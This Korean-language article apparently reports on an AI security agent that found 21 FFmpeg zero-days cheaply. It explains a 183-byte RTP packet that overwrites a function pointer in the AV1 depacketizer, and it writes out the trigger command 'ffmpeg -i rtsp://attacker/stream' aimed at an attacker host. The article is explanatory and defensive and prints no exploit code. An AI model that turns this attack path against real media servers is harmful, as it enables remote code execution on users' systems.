FFmpeg 제로데이 21개와 자율 보안 에이전트: 1,000달러로 본 오픈소스 미디어 보안의 재정의

2026년 6월 기준으로 공개된 이번 사례는 자율적으로 동작하는 AI 보안 에이전트가 대규모 오픈소스 미디어 라이브러리에서 제로데이(공개되기 전 알려지지 않은 취약점)를 체계적으로 발굴해낸 첫 번째 대규모 사례로 평가된다. 본문은 비용, 취약점 분포, 재현 가능한 공격 시나리오를 중심으로 사건의 기술적 의미와 오픈소스 미디어 생태계에 대한 함의를 정리한다.

FFmpeg 제로데이 사건 개요

21개 취약점의 분포와 영향 범위

FFmpeg는 전 세계 브라우저와 스트리밍 인프라에서 미디어를 처리하는 핵심 컴포넌트다. 이번에 발견된 21개 제로데이는 단일 모듈에 집중되지 않고 TS(트랜스포트 스트림) demuxer, VP9(구글의 비디오 코덱) decoder, RTP(실시간 전송 프로토콜)/RTSP(실시간 스트리밍 제어 프로토콜)/RTMP(실시간 메시지 전송 프로토콜) 처리 경로 등 다수의 구성요소에 분포한다. 이는 특정 코덱의 구현 결함에 국한되지 않고 FFmpeg 전반의 입력 경계(input surface)에 잠재 결함이 누적되어 있음을 시사한다. 또한 일부 항목은 15~20년간 잠재 상태로 남아 있었던 것으로 보고되어, 인력 기반 감사만으로 잠재 결함을 모두 점검하는 데는 현실적 한계가 존재한다는 해석이 가능하다.

Autonomous Security Agent의 발견 워크플로우

depthfirst가 공개한 워크플로우는 코드 정적 분석, 퍼징(fuzzing) 결과 교차 검증, PoC 자동 생성을 LLM(대형 언어 모델) 에이전트가 자율적으로 순환하는 구조다. 에이전트는 분석 대상 모듈의 경계 조건을 스스로 선정하고, 발견한 결함에 대해 재현 코드까지 작성한 뒤 익스플로이터빌리티(exploitability)를 자체 채점한 것으로 알려져 있다. 이러한 자율 순환 구조가 150만 줄 규모의 C 코드 베이스에서도 단시간에 다수의 결함을 추출해낸 핵심 동인으로 분석된다.

AI 에이전트 vs 기존 감사 방식의 비용·효율 비교

depthfirst 에이전트 약 1천 달러 vs Anthropic Mythos 약 1만 달러

가장 주목할 지점은 비용 구조의 변화다. depthfirst 측은 이번 분석 작업에 약 1,000달러를 사용했다고 공개했으며, 비교 대상으로 제시된 Anthropic Mythos 기반 감사 사례는 약 10,000달러가 소요된 것으로 보고되었다. 즉 동일하거나 유사한 범위의 보안 감사를 약 10% 비용으로 수행한 셈이다. 다음 표는 공개된 수치를 단순화한 비교다.

구분	depthfirst 자율 에이전트	Anthropic Mythos 기반 감사
대상 코드 규모	약 150만 줄 C	유사 규모 추정
발견 제로데이	21개	비교 수치 미공개
보고된 비용	약 1,000달러	약 10,000달러
비용 비율	약 1배(기준)	약 10배

단, 비교 대상의 대상 코드와 발견 범위가 정확히 동일하다는 보장은 원문에서 제시되지 않았으므로, 비용 수치 자체는 공개된 값에 한정해 해석해야 한다.

150만 줄 C 코드에서 15~20년 묵은 결함 탐지

15~20년간 잠재 상태였던 결함이 존재한다는 사실은, 사람이 읽는 리뷰 위주의 감사만으로는 누적된 잠재 결함을 충분히 해소하기 어렵다는 점을 방증한다. 자율 에이전트는 24시간 연속 가동이 가능하고 모듈 간 의존성을 자동으로 추적할 수 있어, 역사적으로 노출 빈도가 낮았던 경로(예: 특정 컨테이너 포맷, 특정 네트워크 입력 경로)에서도 결함을 끌어올릴 수 있는 것으로 보인다.

기술 분석: AV1 RTP Depacketizer와 183바이트 PoC

함수 포인터 덮어쓰기 메커니즘

공개된 PoC는 183바이트 크기의 RTP 패킷만으로 AV1 RTP depacketizer 내부의 함수 포인터를 덮어쓸 수 있음을 보여준다. AV1은 비교적 최신 코덱으로, RTP 페이로드 포맷과 FFmpeg 내부 디스패치 테이블 간의 정합성을 유지해야 한다. depacketizer가 패킷을 역캡슐화하는 과정에서 길이 또는 모드 필드 검증을 충분히 거치지 않으면 내부 디스패치 테이블의 함수 포인터가 공격자가 제어한 값으로 갱신될 수 있다. 이후 디스패치 테이블을 경유해 호출되는 미디어 처리 함수의 실행 시점에서 프로그램의 제어 흐름이 공격자가 의도한 코드로 넘어가게 된다.

ffmpeg -i rtsp://attacker/stream 공격 시나리오

해당 PoC가 트리거되는 진입점은 다음과 같이 단순하다.

• 사용자가 ffmpeg -i rtsp://attacker/stream 명령을 실행
• FFmpeg이 RTSP 핸드셰이크 후 RTP 스트림 수신
• AV1 depacketizer가 첫 183바이트 패킷을 처리하면서 함수 포인터가 덮어써짐

즉 사용자가 단순한 미디어 재생 또는 변환 명령을 실행한 것만으로 트리거가 형성된다. 별도의 다운로드·실행 단계가 필요하지 않다는 점에서, 미디어 자동화 파이프라인이나 서버 측 트랜스코딩 환경에서 위협 표면이 매우 넓다.

오픈소스 미디어 생태계에 대한 함의

RTP/RTSP/RTMP 처리 경로의 공급망 리스크

FFmpeg는 단독 애플리케이션으로만 사용되지 않는다. 클라우드 트랜스코더, CDN(콘텐츠 전송 네트워크) 노드, 분석 플랫폼, 화상회의 게이트웨이 등 다양한 시스템에 라이브러리 형태로 임베디드된다. 이때 RTP/RTSP/RTMP 같은 네트워크 입력 경로는 외부에서 직접 도달 가능한 경우가 많아, FFmpeg의 네트워크 경로 결함은 곧바로 공급망 보안 사고로 이어질 가능성이 높다. 분석 결과가 시사하는 핵심은, 단일 결함의 영향이 FFmpeg 사용자 전반으로 확산되는 공급망 리스크가 구조화되어 있다는 점이다.

패치·공개 정책과 향후 대응 방향

21개 항목이 모두 동시에 공개된 것이 아니라, FFmpeg 프로젝트와의 조정 하에 순차적으로 패치와 CVE(공통 취약점 식별자)가 공개되는 것으로 파악된다. 향후 대응 방향으로는 다음과 같은 절차가 실효성 있는 것으로 평가된다.

• 정기적으로 자율 에이전트 기반 재감사를 수행해 누적 결함을 상시 점검
• RTP/RTSP/RTMP 같은 외부 입력 경로에 대해 샌드박스 처리 경로 분리
• 의존성 추적 도구로 FFmpeg 임베디드 사용처를 정기적으로 식별

결론: AI 기반 보안 감사의 가능성과 한계

이번 사례는 AI 자율 에이전트가 오픈소스 핵심 컴포넌트의 보안을 재정의할 수 있음을 비용·효율 측면에서 입증한 사례로 평가된다. 그러나 공개된 비용 수치와 취약점 개수는 원문에 명시된 값에 한정해 해석해야 하며, 비교 대상인 Anthropic Mythos와의 비용 격차도 감사 범위와 측정 기준의 차이가 있을 수 있다는 점에서 단정적인 우위 평가로 확장해서는 안 된다. 향후 자율 에이전트의 보편화는 비용 절감과 함께 공격자 쪽에서도 동일한 도구를 활용할 가능성을 높이며, 이는 방어·공격 양측의 진입 장벽을 동시에 낮추는 양면성을 내포한다. 결과적으로 오픈소스 미디어 보안의 다음 쟁점은 도구의 성능이 아니라, 패치 배포 속도와 임베디드 사용처 가시성을 어떻게 확보하느냐로 이동할 것으로 보인다.